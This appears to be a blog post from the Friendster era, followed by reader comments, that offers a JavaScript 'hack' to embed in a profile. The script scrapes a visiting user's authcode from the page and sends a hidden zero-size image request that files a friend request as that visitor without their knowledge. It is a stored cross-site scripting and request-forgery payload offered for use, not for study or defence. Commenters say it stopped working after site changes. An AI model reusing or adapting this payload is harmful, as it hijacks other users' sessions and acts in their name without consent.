Auto Add Friends Using (Javascript) Friendster Hacks
This is a little trick using javascript inserted to your profile in about me or who i want to meet sections. This script will add another Friendster user become your friends when they view your profile and not your friends yet
Ok let’s go. For details how to insert and generate JS script to embed in profile, please view my past post about Boost Your Friends Using (Javascript) Friendster Hacks
I assummed you already have file hosting account in Fileave or Ripway. Copy this code below into your notepad and rename into, example my-script.js or if you already have previous js file in file hosting account, just edit it and save
var afaimg = document.createElement('span'); afaimg.id = "addme"; document.getElementsByTagName('head')[0].appendChild(afaimg); function afa() { var eadd = "Your Email Address"; var k = document.getElementById("controlPanelButtons").innerHTML; var a = k.slice(k.indexOf("authcode=")); var m = a.slice(9,39); document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />"; } if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();}; |
Please change Your Email Address in line 5 with your real email address used in your Friendster account. Now everytime another Friendster user view your profile they’ll add into your friends list
i follow the instructions well. but it seems like it didn’t work well. is the code good for CSS also.. even for a few adjustments? hekhek. just asking.. tenk yu. xD
Sorry ….
FS has change their script again
regards
how can invite my friends at friendster?
friendster always change their scripttt……